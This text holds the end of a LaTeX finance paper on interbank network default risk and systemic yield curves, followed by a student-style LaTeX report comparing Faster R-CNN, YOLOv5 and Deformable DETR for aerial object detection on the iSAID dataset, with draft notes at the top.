As in our prior case studies, we will assume the banking book for the two banks are symmetric so that $\bar L := \bar L_{12} = \bar L_{21}$ and, therefore also, $\lambda := \lambda_1 = \lambda_2$ throughout this example.
In contrast to Section~\ref{sec:Kmaturity-cs-term}, here we assume all obligations are split deterministically so that:
\[L_{12}^l = L_{21}^l = \begin{cases} \bar L/3 &\text{if } l \in \{3,6,10\} \\ 0 &\text{else} \end{cases}
\quad \text{ and } \quad
L_{10}^l = L_{20}^l = \begin{cases} 1/6 &\text{if } l \in \{3,6,10\} \\ 0 &\text{else.} \end{cases}\]
That is, only 3 times ($t \in \{0.3,0.6,1\}$) are maturities for debts and all liabilities are split equally over those dates.
To complete the setup, we will assume that all banks follow the optimal rebalancing strategy $\boldsymbol{\alpha}^*$ (as proposed in Example~\ref{ex:Kmaturity-opt}) with $w := w_1 = w_2 = 2$ and $\theta = 0.08$.
\begin{figure}
\centering
\includegraphics[width=0.6\textwidth]{2bankTerm-leverage-zoom.eps}
\caption{Section~\ref{sec:Kmaturity-cs-leverage}: The term structure for both banks 1 and 2 under varying leverage ratios $\lambda \in [1.5,2.5]$.}
\label{fig:leverage}
\end{figure}
First, we want to comment on the impact that increasing the leverage $\lambda$ of the two banks has on the health of the financial system. As seen in Figure~\ref{fig:leverage}, the system has higher (implied) interest rates $R_i^*(t_l)$ at every time $t_l$ under higher leverage. That is, the probability of a default (as measured at time $0$) increases as the initial leverage $\lambda$ increases. This is as anticipated because larger leverages correspond with firms that are less robust to financial stresses, i.e., a smaller shock is required to cause a bank to default.
\begin{table}[t]
\centering
{\footnotesize
\begin{tabular}{|c||c|c|c|c|c|c|c|c|c|c|c|}
\cline{2-12}
\multicolumn{1}{c|}{} & \multicolumn{11}{|c|}{Leverage $\lambda$} \\ \cline{2-12}
\multicolumn{1}{c|}{} & 1.5 & 1.6 & 1.7 & 1.8 & 1.9 & 2.0 & 2.1 & 2.2 & 2.3 & 2.4 & 2.5 \\
\cline{2-12}\hline
$t = 0.3$ & 0.00\% & 0.00\% & 0.00\% & 0.00\% & 0.00\% & 0.00\% & 0.00\% & 0.00\% & 0.00\% & 13.41\% & 13.41\% \\ \hline
$t = 0.6$ & 0.00\% & 0.23\% & 0.23\% & 0.69\% & 0.69\% & 1.62\% & 2.57\% & 4.01\% & 4.99\% & 11.20\% & 11.20\% \\ \hline
$t = 1.0$ & 0.24\% & 0.33\% & 0.43\% & 0.80\% & 1.01\% & 1.42\% & 2.07\% & 2.71\% & 3.32\% & 6.79\% & 6.79\% \\ \hline
\end{tabular}
}
\caption{Section~\ref{sec:Kmaturity-cs-leverage}: Yields for obligations as measured at time $0$.}
\label{table:leverage}
\end{table}
As obligations are only due at $t \in \{0.3,0.6,1\}$, we wish to consider the interest rates $R_i^*(t_l)$ for those dates specifically. As displayed in Table~\ref{table:leverage}, when the leverage $\lambda$ is small ($\lambda < 2.0$), the interest rates charged are monotonically increasing over time, i.e., a normal yield curve. In particular, this occurs at $\bar L = 0$ (i.e., $\lambda = 1.5$) when no interbank network exists; such a scenario can be compared with, e.g.,~\cite{black1976valuing} where a single firm is studied in isolation. As the leverage $\lambda$ grows via the increased size of the interbank network, the risk of defaults grows as well. This increased network size eventually leads to an inverted yield curve, i.e., in which the implied interest charged on obligations due at $t = 1$ is lower than on those due at $t = 0.6$. Until the leverage is sufficiently high ($\lambda \approx 2.5$), no defaults are realized at the first maturity $t = 0.3$ at all. The banks always make all payments due at $t = 0.3$ because of the tree structure considered herein; specifically, a bank fails to make payments on an early obligation only if it is already close to default at $t = 0$ as the tree model of~\cite{he1990convergence} does not model extreme events.
\subsubsection{A core-periphery network}\label{sec:Kmaturity-cs-cp}
In this final case study, we want to consider a larger financial network than used previously. Specifically, we will study the core-periphery structure for a financial network which has been found in several empirical studies (e.g.,~\cite{CP14,FL15,veld2014core}). In this system we will assume that there are 2 core banks, 10 peripheral banks, and a societal node, i.e., $n = 12$ banks. Each core bank owes the other core bank \$3, all of the peripheral banks \$0.50, and society \$5. The peripheral banks owe both core banks \$0.50, nothing to the other peripheral banks, and \$1 to society.
These obligations will be equally split at times $0.2,~0.4,~0.6,~0.8,~1$ with $\ell = 5$.
As before, we will assume the prevailing risk-free interest rate $r = 0$.
As in Section~\ref{sec:Kmaturity-cs-leverage}, we will assume that all banks follow the optimal investment strategy $\boldsymbol{\alpha}^*$ presented in Example~\ref{ex:Kmaturity-opt} with $w_i = 2$ for every bank $i$ and with regulatory threshold $\theta = 0.08$.
Finally, the external assets are as follows. The core banks begin at time $t = 0$ with \$15 in external assets each. The peripheral banks begin with \$3 in external assets each. The correlation between any pair of bank assets is fixed at $\rho = 0.3$.
We will study two scenarios for the external asset volatilities:
\begin{enumerate}
\item a low volatility (unstressed) setting in which the volatility of the external assets for either core bank is $\sigma_C^2 = 0.75$ and the volatility for the external assets of any peripheral bank is $\sigma_P^2 = 0.5$;
\item a high volatility (stressed) setting in which the volatility of the external assets for either core bank jumps upward to $\sigma_C^2 = 1$ while the volatility for the peripheral banks is unaffected ($\sigma_P^2 = 0.5$).
\end{enumerate}
\begin{figure}[h]
\centering
\begin{subfigure}[t]{0.45\textwidth}
\centering
\includegraphics[width=\textwidth]{CP-unstressed.eps}
\caption{The low volatility (unstressed) setting.}
\label{fig:cp-unstressed}
\end{subfigure}
~
\begin{subfigure}[t]{0.45\textwidth}
\centering
\includegraphics[width=\textwidth]{CP-stressed.eps}
\caption{The high volatility (stressed) setting.}
\label{fig:cp-stressed}
\end{subfigure}
\caption{Section~\ref{sec:Kmaturity-cs-cp}: The term structure for the core and peripheral banks under the two stress scenarios (i.e., $\sigma_C^2 = 0.75$ and $\sigma_C^2 = 1$ respectively).}
\label{fig:cp}
\end{figure}
As depicted in Figure~\ref{fig:cp-unstressed}, in the low volatility (unstressed) setting, all banks in the system have a normal yield curve with interest rates $\vec{R}^*(t_l)$ in the low single digits at each maturity date. In comparison, in the high volatility (stressed) setting displayed in Figure~\ref{fig:cp-stressed}, all banks have an inverted yield curve with interest rates in the double digits. Notably, the stress scenario only includes an increase in the core volatilities $\sigma_C^2$ without any direct change to the balance sheet of the peripheral banks. Therefore the change in the term structure for peripheral banks is being driven entirely by the contagion from stresses to the core institutions. Though a stylized system, this highlights the importance of regulating systemically important financial institutions (i.e., core banks) as their stress can readily spread throughout the entire financial system.
\section{Conclusion}\label{sec:conclusion}
\subsection{Policy implications}
Within this work, we have constructed a dynamic model of the interbank network with forward-looking probabilities of default. In doing so, we found (numerically) that even small shocks that do not precipitate short term default, can still be relevant for stress testing purposes. For instance, as seen in Section~\ref{sec:Kmaturity-cs-cp} , stressing the volatility of core institutions can cause large impacts to the risk of future defaults through the feedback mechanisms. In this way, stress tests can be constructed so that the long term effects of the stress scenario can filter backwards in time to harm financial stability without having to trigger short term actualized defaults. This is distinct from how stress testing is typically carried out in which only the short term liquidity of firms is paramount (i.e., in line with the one period models of, e.g.,~\cite{EN01,RV13,GK10}).
Furthermore, recent works (see, e.g.,~\cite{greenwood2022predictable}) have explored the possibility of predicting \emph{future} financial crises from the available data. Empirical works (such as~\cite{bluwstein2021credit,babecky2014banking}) in this direction find that the shape of the yield curve can have strong predictive power. As we are able to construct a systemic term structure, our model is able to endogenize some of those effects due to the contagion through the probability of defaults. In particular, we construct a structural model for this type of contagion which provides some theoretical backing to the observations regarding the predictive power of yield curves. Such results point to the possibility of probabilistic stress tests in which the resulting systemic yield curves -- and the resulting possibility of a financial crisis -- are the primary outcomes.
\subsection{Extensions}
We wish to conclude by considering two important extensions of the framework presented herein.
First, due to the exponential size of trees in the number of banks and the number of time steps, simulating large networks is computationally expensive. One important extension of this work is finding a Monte Carlo approach to approximate the clearing solutions for larger systems. Formulating such a numerical method requires further consideration due to the forward-backward construction of this model; specifically, we cannot simply simulate the process backwards in time with a least squares Monte Carlo approach. Furthermore, typical least squares Monte Carlo approaches perform poorly for this model because fixed points and equilibria are often sensitive to the parameters which leads to flawed regressions.
A second natural extension would be to consider the continuous-time limit. In particular, one may ask if the discrete stochastic integral representations provided by Remark \ref{rem:integral} propagate to the limit, similarly to the results of \cite{he1990convergence} for passing from discrete- to continuous-time within the classical Black--Scholes framework. Due to the dependence on the conditional probability of default, this may be viewed as a new type of McKean--Vlasov problem related to continuous-time McKean--Vlasov problems for hitting times that have recently been studied in the probability literature as per Remark \ref{rem:mckean-vlasov}. When restricting to the filtration generated by the Brownian motions, the particular structure of our model allows it to be recast as a system of forward-backward stochastic differential equations, but the analysis of this system does not seem to fit within the scope of any known results, thus calling for new mathematical developments.
\bibliographystyle{plainnat}
| 2024-02-18T23:40:18.080Z | 2022-11-29T02:26:09.000Z | algebraic_stack_train_0000 | 1,984 | 16,777 |
|
proofpile-arXiv_065-9790 | \section{Salem Scrapyard}
Please do not delete any of this, just comment them instead.
\subsection{One-Stage Object Detector}
\subsection{Two-Stage Object Detector}
\subsection{iSAID}
There are various aerial or satellite imagery datasets used to train models for tasks like classification, object detection, semantic segmentation like [][][][]. In iSAID \cite{waqas2019isaid}, a collection of large-scale, densely annotated aerial images are made suitable for instance segmentation. *Maybe note that this is an extended version of DOTA?
\subsection{COCO Format}
Datasets dedicated for visual tasks such as object detection or segmentation consist of images and their metadata. The metadata file include label information for each image with annotations of bounding boxes specifying the location of each category found in every image. A widely used dataset is MS COCO \cite{10.1007/978-3-319-10602-1_48}, used as a benchmark, its data structure termed by COCO format was found to be convenient for many following datasets and models. iSAID metadata for labelled annotations were provided in COCO JSON format which had to be converted into YOLO TXT format using an algorithm, such that every file corresponded to an existing image, stored under label folder. Each text file included a number of sentences depending on number of annotated objects and their bounding boxes.
\subsection{Discussion}
\subsubsection{Background}
Recommended to use background images that would make up 1 to 10 percent of the total dataset used for training.\
Train set has 84,087 (16,384) labeled @ 19.48 percent.\ Background images are 5.132 times greater than than labeled.\
Validation set has 28,536 (6,049) labeled @ 21.19 percent. Background images 4.717 times greater than labeled.
Test set has 19,377.\
This resulted in longer training and validation time for out models, 5 epochs would take around 5 hrs, and for a good model to be trained it is expected to have at least 300 epochs.\
Along with all modifications expected to be done to achieve a good trade-off between accuracy and speed, the current setup did not allow for a shorter training time.\
Test1:
5 epochs for 5s and 5l @ 640, batch-size of 16.\
remark: no instances images, only labeled images training = 16,384, validation = 6,049.\
The time taken per epoch for yolo5l used to take as long as 31 minutes, but now after the adjustment which involved removing all extra background images, one epoch takes around 6.24 minutes.\
Accuracy performance improved between 6.1 percent to 13.2 percent for 5s and 5l respectively, however it is important to note that even validation set did not have any background images, and thus there was no way or method implemented to reduce the rate of false-positive detection.\
The time taken per epoch for yolo5s used to take as long as 14.67 minutes, but now after the adjustment which involved removing all extra background images, one epoch takes around 6 to 7 minutes.
Test2: add 10 percent background for test+validation\
Increase in test time and slight decrease in over-all accuracy, with increases in low performing classes.
2.32 minutes to 2.51 on yolov5s
6.24 minutes to 6.41 minutes on yolov5l
\subsubsection{Hyperparameter}
For yolov5, to adjust hyperparameters it can be done through scratch or finetune files depending on specified settings.
Hyperparameter evolution is used ..
\subsubsection{Thresholds}
A baseline model trained on fixed parameters is used as a reference for upcoming models which will be trained based on tweaking various parameters and training settings. The first sign of progress is always noted with the results obtained by experimenting the model on the validation process during the training phase. However, this indicator is not sufficient, as a result additional efforts were made to evaluate the model visually. The first experiment involved loading the trained model on the test set, were the output generated is a set of images with multiple bounding boxes for detected objects. Visually, the results were promising as there weren't multiple bounding boxes per object, nor weak guess were different classes are predicted in the same bounding box. The second experiment involved validating the compiled JSON file which was converted from the set of labeled text files generated by the model. Note that the two visual experiments differ in terms of output were the first outputs images and the second outputs results for each image in text format. Using FiftyOne [], an evaluation tool developed by Voxel51 for models and datasets, the JSON file was loaded along with the directory of test images to visually evaluate the model's performance and confirm the usability of compiled JSON file. \
Confidence threshold and IoU threshold tweaking to increase model performance. \
** add examples \
\subsubsection{Tweak-able Parameters}
batch size, img size, epoch, confidence threshold, IoU threshold, background percentage, prune, loss function.
\subsubsection{Sparse vs Dense}
\section{Introduction}
\section{Methods}
\section{Results and Discussion}
\section{Conclusion}
{\small
\bibliographystyle{ieee}
\section{Introduction
Object detection is a very popular computer vision task which involves both objects locating and classifying in an image.
Though this task has been extensively studied for usual natural images, there is limited exploration in the field of aerial object detection. Aerial object detection brings various challenges such as large scale variation, uneven distribution of objects, class imbalance etc. which further makes the detection of objects much more demanding. However, the problem is particularly interesting due to its important applications such as defence, forestry, city planning etc.
In this project we have performed experiments on the iSAID dataset which is a Large-scale Dataset for Object detection and Instance Segmentation in Aerial Images (iSAID) \cite{waqas2019isaid}. It includes 2,806 high-resolution images taken by satellites, and collects 665,451 densely annotated object instances, belonging to a total of 15 classes.
In this work we, first, perform object detection in aerial images using two-stage, one-stage and attention-base detectors. Owing to the significant variation in the model architectures, it is natural that the same modification may not be suitable for all architectures. Hence, we describe modifications and analysis performed in each of the 3 models. \textbf{For the two-stage model}, we have used the Faster-RCNN architecture where we introduced modifications such as weighted attention based FPN to better handle scal variation, simple class balanced sampler to handle the inherent long tail distribution and a density prediction head to tackle the large density variation observed in and among different images. \textbf{For the one stage model}, we have used the YOLOv5 model and tried to analyse the performance with the addition of weighted focal loss to counter class imabalnce and FPN in attempt to deal with various scales. \textbf{For attention based detector,} we have used DETR model. We tried to analyse the effect of different attention levels such as single scale, multi scale attention and the impact of different bakbones such as ResNet50,ResNet101 etc.
And finally, we demonstrate a comparison between each of the considered detectors with respect to aerial object detection.
\section{Methods}
The used iSAID dataset and the architectures we experimented with: two-stage, one stage and attention based object detectors, are discussed in the following subsections.
\subsection{Dataset}
A Large-scale Dataset for Object Detection and Instance Segmentation in Aerial Images (iSAID) \cite{waqas2019isaid} is the dataset which was specifically developed for the tasks of object detection, semantic and instance segmentation of aerial images. It includes 2,806 high-resolution images taken by satellites, and collects
665,451 densely annotated object instances, belonging to a total of 15 classes. The iSAID follows the same annotation format used in the popular MS COCO dataset and provides bounding boxes and pixel-level annotations, where each pixel represents a particular class (or absence of any). In order to leverage the limitations of input size of the model used, the original images were cropped into equal overlapping patches with 800x800px resolution.
\begin{figure} [!ht]
\centering
\includegraphics[scale = 0.69]{Images/Dmitry/1_Labels_per_class.png}
\caption{Number of instances per each class in the train and validation sets of the iSAID dataset \cite{waqas2019isaid}. Notations: ST - storage tank, BD - baseball diamond, TC - tennis court, BC - basketball court, GTF - ground track field, LV - large vehicle, SV - small vehicle, HC - helicopter, RA - roundabout, SBF - soccer ball field, SP - swimming pool.}
\label{fig:labels}
\end{figure}
The dataset has several distinguishing characteristics, such as large number of images with high spatial resolution, large count of labelled instances per image (which might help in learning contextual information), noticeable scene variation depending on an object type, and imbalanced and uneven distribution of objects. One of the most important key characteristics of the dataset is its huge size and scale variation of the objects, providing the instance size range from 10x10px to 300x300px, which is also the case for instances of the same class. A representation for some of the above-mentioned properties can be seen in the figure \ref{fig:labels}.
\subsection{Two stage detector}
Several two stage approaches have been developed for object detection. R-CNN \cite{girshick2014rich} used selective search algorithm to generate bounding box proposals. Fast R-CNN \cite{girshick2015fast} is an extension of R-CNN\cite{girshick2014rich} which enabled end-to-end training using shared convolutional features, thus improving train and inference speed while also increasing detection accuracy. Faster R-CNN \cite{ren2016faster} replaced selective search with Region Proposal Network (RPN) which generates multi-scale and translation-invariant region proposals based on the high-level features of images. It uses RoI pooling to crop the feature maps according to the proposals. This is followed by a small convolution network with classification and regression branch. We have carried out experiments using Faster-RCNN implemented in Detectron2 \cite{wu2019detectron2} framework with ResNet-101 FPN backbone. We introduced some modifications in the Faster-RCNN architecture inorder to address some issues specific to the dataset as explained below.\\
\textbf{Handling scale variation: } Feature pyramid network has been a popular approach used to handle scale variation. It includes a bottom up network and top-down network connected using 1x1 lateral connections. This is followed by a convolutional layer with large kernel to increase receptive field. However, FPN still struggles to deal with huge scale variation. This motivated us to introduce a modification in the FPN so that it can better handle varying size of objects.
It is well known that small objects are more likely to be identified in the higher resolution layer P5, medium size objects in layer P4/P3 and large objects can be identified from the low resolution layers P2/P3 of FPN. This indicates that having access to more information i.e. from high resolution feature maps could be helpful for better dealing with varying sizes of objects.
We transformed this intuition such that information from higher resolution feature maps be transferred to lower resolution feature maps. This information has been incorporated in the form of channel attention over the feature maps by drawing inspiration from works such as Squeeze-Excitation blocks \cite{hu2019squeezeandexcitation} and CBAM \cite{woo2018cbam}. However, owing to this change there was an improvement observed in the mAP but it was prominent only for medium and large objects which appears to be logical. Thus, inorder to better deal with the small objects as well, we introduced a small weighting factor for each of the output feature maps as shown in Fig \ref{fig:fpn}, where $wt_4$ $>$ $wt_3$ $>$ $wt_2$ $>$ $wt_1$.
\begin{figure}[!ht]
\centering
\includegraphics[width=0.8\linewidth]{Images/FPN.png}
\caption{Weighted FPN with channel attention}
\label{fig:fpn}
\end{figure}
\textbf{Handling class imbalance: } In the iSAID dataset, a lot of class imbalance is observed which also been depicted in Fig \ref{fig:labels}. This corresponds to the problem of long tail distribution where some classes have large number of instances and some classes have very few number of instances. This can in turn cause the model to be biased towards the frequent classes and hence perform worse on the rare classes. We tried to address this issue by implementing a class balanced foreground sampler in the RoI head. Based on the statistics of the dataset, we segregated the classes into 3 different groups i.e. frequent, common and rare and adjusted the number of proposals for each group.\\
\textbf{Handling uneven distribution/ modelling context: } From the dataset, it can be observed that there is a lot of variation in the distribution of instances within an image as well as across the dataset. This uneven distribution of instances could confuse the model due to the persistent variation. This motivated us to think about modeling the distribution/context about an object instance and introduce the density prediction head in the RPN. The density prediction head was first introduced in the Adapative NMS paper \cite{liu2019adaptive} and was used to capture the surrounding density inorder to adaptively adjust the NMS threshold. However, we use the same density prediction head for a different objective.
It stacks the classification and bounding box regression branch feature maps along with the output of a 1x1 convolutional layer. This is followed by a convolutional layer with 5x5 kernel which effectively helps capture considerable information in the surroundings of an object as shown in Fig \ref{fig:density}. The corresponding ground truth density is calculated as $d_i$ := max $b_j \epsilon \mathcal{G}$ ,i$\neq$j iou($b_i,b_j$),
where the density of the object i is defined as the max bounding box IoU with other objects in the ground truth set $\mathcal{G}$ and smooth L1 loss is used.
Furthermore, to the best of our knowledge we are the first to employ the density prediction head for aerial imagery.
\begin{figure}[!ht]
\centering
\includegraphics[width=\linewidth]{Images/density.png}
\caption{Density prediction head for the Faster R-CNN}
\label{fig:density}
\end{figure}
\subsection{One stage detector}
In one-stage detectors, a one-shot configuration is proposed to replace region proposals, such that classification and regression take place immediately on candidate anchor boxes. With this improvement, architecture is simpler and inference time is more suitable for realistic applications. SSD, YOLO and RetinaNet are examples of one-stage detectors \cite{7780460} \cite{DBLP:journals/corr/LiuAESR15} \cite{DBLP:journals/corr/abs-1708-02002}.YOLOv5 architecture consists of three parts: (1) Backbone: CSPDarknet, (2) Neck: PANet, and (3) Head: Yolo Layer. The images are first input to CSPDarknet for feature extraction, and then fed to PANet for feature fusion. Finally, Yolo layer outputs detection results (class, score, location, size).\\
We introduced some modifications in the YOLOv5 architecture inorder to address some issues specific to the dataset as explained below.\\
\textbf{Focal Loss :} The iSAID dataset consists of multiple object classes which can be grouped based on the number of occurrences per image, certain object classes have higher occurrences rate such as Small vehicles when compared to other classes such as bridge, helicopter, roundabout etc. as shown in figure \ref{fig:labels}.
For model training, it is expected to have a specific number of training examples per class, with an overall assumption of equal distribution of data, else the model could be biased. In \cite{lin2018focal} a work around for class imbalance is introduced, which is considered as an extension for cross-entropy loss function named as focal loss. There are two adjustable parameters for focal loss, $\gamma$ and $\alpha$. Increasing $\gamma$ value brings model's attention towards object class which are difficult to classify, and increasing $\alpha$ value results in dedicating more weights for object classes with lower annotations.
\textbf{Feature Pyramid Network :}
Motivated by scale-variation and the ability of FPNs to deal with multiple scales, YOLOv5 architecture was further enhanced with a Feature Pyramid Network. After adding FPN, an mAP of 0.422 was observed on the validation set.
\subsection{Attention-based detector}
Another approach considered in this work is called Deformable DETR (Deformable Transformers for End-to-End Object Detection) \cite{zhu2021deformable}, which is an attention-based detector. This recently proposed method attempts to both eliminate the previous need of manually-designed components in object detection while still demonstrating good performance and efficiency.
As can be seen in the figure \ref{fig:deformable}, Deformable DETR combines two popular computer vision techniques, thereby leveraging their advantages in the way that they can be applied for solving drawbacks of each other.
The first component is a transformer-based object detection model, DETR (End-to-End Object Detection with Transformers) \cite{carion2020endtoend}. This quite recently published method solves the object detection task as a direct set prediction problem. The approach provides a streamlined detection pipeline and effectively removes the need for many hand-designed components like a non-maximum suppression procedure or anchor generation that explicitly encode prior knowledge about the task. The main ingredients of this framework, called DEtection TRansformer or simply DETR, are a set-based global loss that forces unique predictions via bipartite matching, and a transformer encoder-decoder architecture. Given a fixed small set of learned object queries, DETR identifies the relations of the objects and the global image context in order to directly output the final set of predictions in parallel. According to the provided by the authors code and various experiments, the model is conceptually simple and efficient, unlike the majority of other modern detectors. DETR demonstrates accuracy and run-time performance on par with the well-established and highly-optimised Faster R-CNN baseline \cite{girshick2015fast}.
The second important part, used to build Deformable DETR, is Deformable Convolutional Networks \cite{dai2017deformable}. It was proved by the authors that the convolutional neural networks (CNNs) with original convolutional layers \cite{cnn} are inherently limited to model geometric transformations due to the fixed geometric structures. To solve this limitation by enhancing the transformation modeling capacity of CNNs, a deformable convolution module was introduced. It is based on the idea of augmenting the spatial sampling locations in the modules with additional offsets and learning the offsets from target tasks, without additional supervision. The new modules, as authors mentioned, can easily replace their plain counterparts in existing CNNs, and can be easily end-to-end trained by standard back-propagation. The high effectiveness of Deformable CNNs was also validated with extensive experiments on such complex vision tasks as object detection and semantic segmentation.
\begin{figure}[!ht]
\centering
\includegraphics[width=1.0\linewidth]{Images/Dmitry/1_Deformable.png}
\caption{Illustration of the deformable attention module (the aggregation part is not shown) \cite{zhu2021deformable}}
\label{fig:deformable}
\end{figure}
Therefore, the combination of both Deformable convolution, which helps to solve the problem of sparse spatial sampling, and DETR Transformer, which is responsible for relation modeling capability, results in a model that have such advantages as fast convergence, computational feasibility, and memory efficiency.
Moreover, the proposed multi-scale deformable attention architecture attends to only a small set of sampling locations on the feature map pixels, while still having adequate performance, what is presented by the authors as a reasonable replacement for manually-optimised FPN and computationally inefficient full-attention.
Provided in the original paper \cite{zhu2021deformable} results of extensive experiments with Deformable DETR, which was introduced with a goal to mitigate the slow convergence and high complexity issues of DETR, indeed show that on the MS COCO \cite{lin2015microsoft} the benchmark demonstrates its superior effectiveness.
The visualisation of results indicates that the proposed combination of these above-mentioned modules in Deformable DETR looks at extreme points of the object to determine its bounding box, which is similar to the observation in DETR. However, Deformable DETR, more concretely, besides attending to left/right and top/bottom boundaries of the object, also attends to pixels inside the object for predicting its category, which is different to original DETR \cite{carion2020endtoend}.
In addition, compared with its predecessor, Deformable DETR achieves better performance with significantly smaller number of training epochs. This effect is also especially noticeable on small objects, what is, at the same time, can be helpful for the considered iSAID dataset.
\section{Experiments and Results
\subsection{Faster R-CNN}
To further verify the impact of the modifications, we have performed an ablation study and report the results on the iSAID validation set as shown in Fig \ref{fig:det2 ablation}. It can be observed that incrementally adding each modification resulted in better performance indicated by mAP.
The introduction of weighted FPN with channel attention was able to considerably improve the mAP indicating that using information from higher resolution layers is favorable when dealing with different scale objects. We found that using small weights was beneficial. Emperically, we set $wt_1$=1.5, $wt_2$=2, $wt_3$=2.5, $wt_4$=3.\\
Addition of the class balanced sampler in the RoI head was able to further improve the performance by 0.5 mAP. During training, we tried to ensure that the proposals are selected in a balanced way from each group thus reducing the possibility of bias towards a set of classes. We choose 256 proposals in the RoI head. Usually 25\% (64) proposals are considered as foreground. We ensure that 24 proposals are selected from the rare classes and 20 proposals each from the common and frequent classes.\\
Introducing the density prediction head also led to increase in mAP, however the effect was more pronounced for small objects. This affirms that having knowledge of the context/ density around an instance can be very useful especially for small objects.
All experiments have been carried out with the following settings - batch size of 2, learning rate of 0.0025, momentum of 0.9, weight decay of 0.0001 and $\gamma$ = 0.1 run for 100,000 iterations.
\begin{figure}[!ht]
\centering
\includegraphics[width=1.1\linewidth]{Images/det2_ablation.png}
\caption{Faster R-CNN modifications ablation study, results on validation set}
\label{fig:det2 ablation}
\end{figure}
\subsection{YOLOv5}
Inorder to work with the dataset, we had to perform some preprocessing steps -
\subsubsection{Preprocessing: COCO JSON to YOLO TXT}
Datasets dedicated for visual tasks such as object detection or segmentation consist of images and their metadata. The metadata file include label information for each image with annotations of bounding boxes specifying the location of each category found in every image. A widely used format is MS COCO format \cite{10.1007/978-3-319-10602-1_48}. iSAID metadata is provided in COCO JSON format. However, for YOLO it had to be converted into TXT format using an algorithm. Information related to each image was stored in a separate text file titled with respective image name.
For generating an output json file, a Javascript code was used, which reads each image's name in the directory and replaces it with entry id number.
\subsubsection{Preprocessing: Background Images Reduction}
In YOLO, unlabelled images are used as background images during training to reduce false positives and balance out the weights. This is unlike other models which neglect such images. An experiment was carried out to identify what percentage of background images would yield the highest accuracy and shortest training time. In \ref{tab:table100}, the number of labelled/unlabelled images in training/validation sets are shown as per given iSAID dataset. When YOLOv5L was trained using a resolution of 640, batch size of 16, one epoch at full scale required 31 minutes, but when background images were reduced to 0, training only on labelled images, it took 6.24 minutes per epoch. Moreover, in table \ref{tab:table101}, three models were trained at full-scale, labelled + 10\% unlabelled and labelled images only, where the latter achieved highest accuracy and fastest training time.
\begin{table}[h]
\footnotesize
\centering
\begin{tabular}{| c | c | c | c |}
\hline
\textbf{iSAID} & \textbf{Unlabelled} & \textbf{Labelled}\\
\hline
Training Set & 67703 & 16384 \\
\hline
Validation Set & 22487 & 6049 \\
\hline
\end{tabular}
\caption{Comparison Table between labelled and unlabelled images
\label{tab:table100}
\end{table}
\begin{table}[h]
\footnotesize
\centering
\begin{tabular}{| c | c | c | c |}
\hline
\textbf{Images} & \textbf{Training time} & \textbf{Epochs} & \textbf{mAP@.5:.95}\\
\hline
84087 & 179m & 5 & 0.3314 \\
\hline
18018 & 43m & 5 & 0.3448 \\
\hline
16384 & 40m & 5 & \textbf{0.3811} \\
\hline
\end{tabular}
\caption{Model performance comparison based on background image percentage.}
\label{tab:table101}
\end{table}
We tried playing with $\alpha$ and $\gamma$ parameters in the focal loss function. The bests results can be seen in Table \ref{tab:table102}.
\begin{table}[h]
\footnotesize
\centering
\begin{tabular}{| c | c | c | c |}
\hline
\textbf{$\gamma$} & \textbf{$\alpha$} & \textbf{mAP@.5} & \textbf{mAP@.5:.95}\\
\hline
1.5 & 0.25 & 0.685 & 0.466 \\
\hline
2.0 & 0.25 & 0.689 & 0.469 \\
\hline
\end{tabular}
\caption{Focal loss}
\label{tab:table102}
\end{table}
YOLOv5 Large architecture (normal), focal loss modified, and FPN modified models were run on iSAID's validation set at resolution of 640, batch size of 16 and epochs of 50 and results are presented in figure \ref{fig:yolo}. In terms of precision and mAP@.5:.95, YOLOv5L scored the highest results when compared to other models. In terms of mAP@.5, the focal loss modified model showed better performance, while FPN modified model scored lowest of all models in all evaluation metrics. The YOLOv5 architecture is highly optimized for object detection tasks and receives consistent updates on uploaded repository.
\begin{figure}[!ht]
\centering
\includegraphics[width=1.1\linewidth]{Images/yolo.png}
\caption{Results for validation set using YOLOv5}
\label{fig:yolo}
\end{figure}
\subsection{Deformable DETR}
At the moment, due to the recentness of the detection transformer, it has only been tested mainly on the popular, well-studied, and relatively balanced object detection datasets, such as MS COCO \cite{lin2015microsoft}, Pascal \cite{mottaghi_cvpr14}, etc.
In this subsection, we explore the performance of the Deformable DETR and its variations on the iSAID dataset.
If not mentioned another setup, due to the limited time and available computing resources, the following models were trained with the following hyper-parameters: batch size of 6, 15 epochs, learning rate of 2e-4 for encoder-decoder, learning rate of 2e-5 for a backbone, learning rate decays by 0.5 multiplier at each 7th epoch for encoder-decoder and for fully connected classifiers. On average, training time with these parameters is approximately 18-25 hours, depending on the architecture.
\textbf{Singe-Scaled attention:}
First, as a baseline, we chose a single-scaled Deformable DETR model, described in the original paper. It uses an ImageNet pre-trained ResNet-50 convolutional neural network as a backbone for feature extraction. The extracted features from the last convolutional layer with the size of 7x7x2048 are used as an input for the encoder-decoder transformer.
Even this simplified architecture shows decent performance with the mAP value equal to $0.303$, which is quite close to the Faster R-CNN baseline model. Taking into account that the model is trained from scratch for only 15 epochs, we suggest that it is able to reach satisfactory results in case of longer training time.
\textbf{Multi-Scaled attention:}
Next, in order to confirm the suggestion, made in \cite{zhu2021deformable} regarding the performance improvement for small and medium-sized objects, when a multi-scaled attention module is used, we also trained this model from scratch.
The multi-scaled encoder transformer module uses Conv3-5 ordinary layers from a CNN backbone, and also uses a Conv5 layer with a stride of 2 applied. All the number of feature channels are projected to 256 to have the same appropriate input size before being fed to the encoder transformer. Architecture of this module can be found in the figure \ref{fig:multi-scaled}.
\begin{figure}[!ht]
\centering
\includegraphics[width=\linewidth]{Images/Dmitry/3.2_Multi.png}
\caption{Image feature maps, extracted with a CNN backbone are inputs for a multi-scaled attention module (encoder part); the architecture proposed by \cite{zhu2021deformable}}
\label{fig:multi-scaled}
\end{figure}
From the obtained results, one can observe that indeed, the mAP for small and medium objects increased by 20 \%, comparing to the single-scaled architecture. This can be explained by the fact that iSAID dataset has much more corresponding-sized objects, rather than larger ones.
Since this architecture uses considerably more memory to store image features, the batch size value was decreased to 4.
\textbf{ResNet-101 Backbone:}
Another improvement we experimented with is changing the CNN backbone to a larger one, ResNet-101. Although it was not noticeably useful for the usual datasets as COCO and ImageNet where the medium objects are typically still covering significant part of the image frame, we assume that for the iSAID dataset, having larger image resolution, this may help to identify medium instances better. We also expect a certain minor performance increase for the small and large objects, but since the architecture of ResNet-50 and ResNet-101 differ only with the Conv3 layer depth, we assume that the effect should be mostly directed at the medium ones.
From our experimental observations, this assumption actually takes place, since in case of a single-scale version the accuracy indeed increased by 20 \% for the middle-sized instances, and only by 7-9 \% for the rest of them. In case of the multi-scale attention architecture, the increasing is 10 \% for medium objects, and nearly 3 \% for the rest.
